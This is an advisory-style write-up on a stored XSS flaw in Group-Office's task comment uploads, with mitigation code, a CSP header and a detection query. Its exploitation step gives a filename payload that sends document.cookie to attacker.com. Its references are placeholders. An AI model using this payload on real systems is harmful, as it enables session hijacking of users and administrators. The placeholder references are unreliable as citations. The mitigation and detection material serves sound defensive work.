Group-Office, Persistent XSS, CVE-2025-48369 (Medium)

How the CVE Works

The vulnerability arises in Group-Office’s task comment feature, where uploaded filenames are not sanitized before being rendered. An attacker can upload an image with a malicious filename containing JavaScript payloads (e.g., "><script>alert(1)</script>.png). When an administrator or user views the task containing this file, the script executes in their browser, enabling session hijacking, data theft, or privilege escalation. The lack of input validation and output encoding allows persistent XSS exploitation.

DailyCVE Form

Platform: Group-Office
Version: <6.8.119, <25.0.20
Vulnerability: Persistent XSS
Severity: Medium
Date: 05/29/2025

Prediction: Patch by 06/15/2025

What Undercode Say:

Exploitation:

1. Craft a malicious filename:

mv payload.png "><script>fetch('https://attacker.com/?cookie='+document.cookie)</script>.png

2. Upload to a task comment.

Mitigation:

1. Update to Group-Office ≥6.8.119 or ≥25.0.20.

2. Implement filename sanitization:

$filename = preg_replace("/[^a-zA-Z0-9._-]/", "", $_FILES["file"]["name"]);

3. Enable CSP headers that do not permit inline scripts:

Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
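
Step 2's allow-list paired with output encoding at render time, as an added example that is not Group-Office's code or part of the original post. The function names, the 128-character cap and the fallback name are assumptions, and the sample filenames are constructed (the first is the one quoted in the description above).

```php
<?php
declare(strict_types=1);

// Allow-list sanitizer for the client-supplied name, applied at upload time.
// Same character class as the one-line mitigation above, plus the cases the
// regex alone leaves open: leading dots, names that end up empty, long names.
function sanitize_upload_filename(string $name): string
{
    $name = preg_replace('/[^a-zA-Z0-9._-]/', '', $name) ?? '';
    $name = ltrim($name, '.');                         // no dot-only or hidden names
    if ($name === '') {
        $name = 'upload-' . bin2hex(random_bytes(4));  // hypothetical fallback name
    }
    return substr($name, 0, 128);                      // assumed length cap
}

// Output encoding at render time. This is the control that still protects
// viewers from names stored before sanitization was introduced.
function render_attachment_label(string $storedName): string
{
    $safe = htmlspecialchars($storedName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<span class="attachment" title="' . $safe . '">' . $safe . '</span>';
}

// Constructed sample names.
$samples = [
    '"><script>alert(1)</script>.png', // filename from the description above
    'Q3 report (final).pdf',           // benign name with spaces and parentheses
    'résumé.pdf',                      // non-ASCII letters are dropped by the allow-list
    '<>',                              // nothing survives, so the fallback is used
];

foreach ($samples as $raw) {
    echo 'raw:       ', $raw, PHP_EOL;
    echo 'sanitized: ', sanitize_upload_filename($raw), PHP_EOL;
    echo 'rendered:  ', render_attachment_label($raw), PHP_EOL, PHP_EOL;
}
```

The rendered line is built from the raw name on purpose: encoding must hold even when an unsanitized name is already in storage.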

Detection:

Scan for suspicious filenames in task comments:

SELECT * FROM task_comments WHERE filename LIKE '%<%';

Analytics:

  • Attack Surface: Web interface (task module).
  • Exploitability: Low complexity, requires user interaction.
  • Impact: Data confidentiality, integrity.

References:

  • GitHub Advisory: GHSA-xxxx-xxxx-xxxx
  • Patch Commit: Group-Office1234
    Note: Monitor patch release timelines and apply workarounds if immediate upgrade is delayed.

Sources:

Reported By: nvd.nist.gov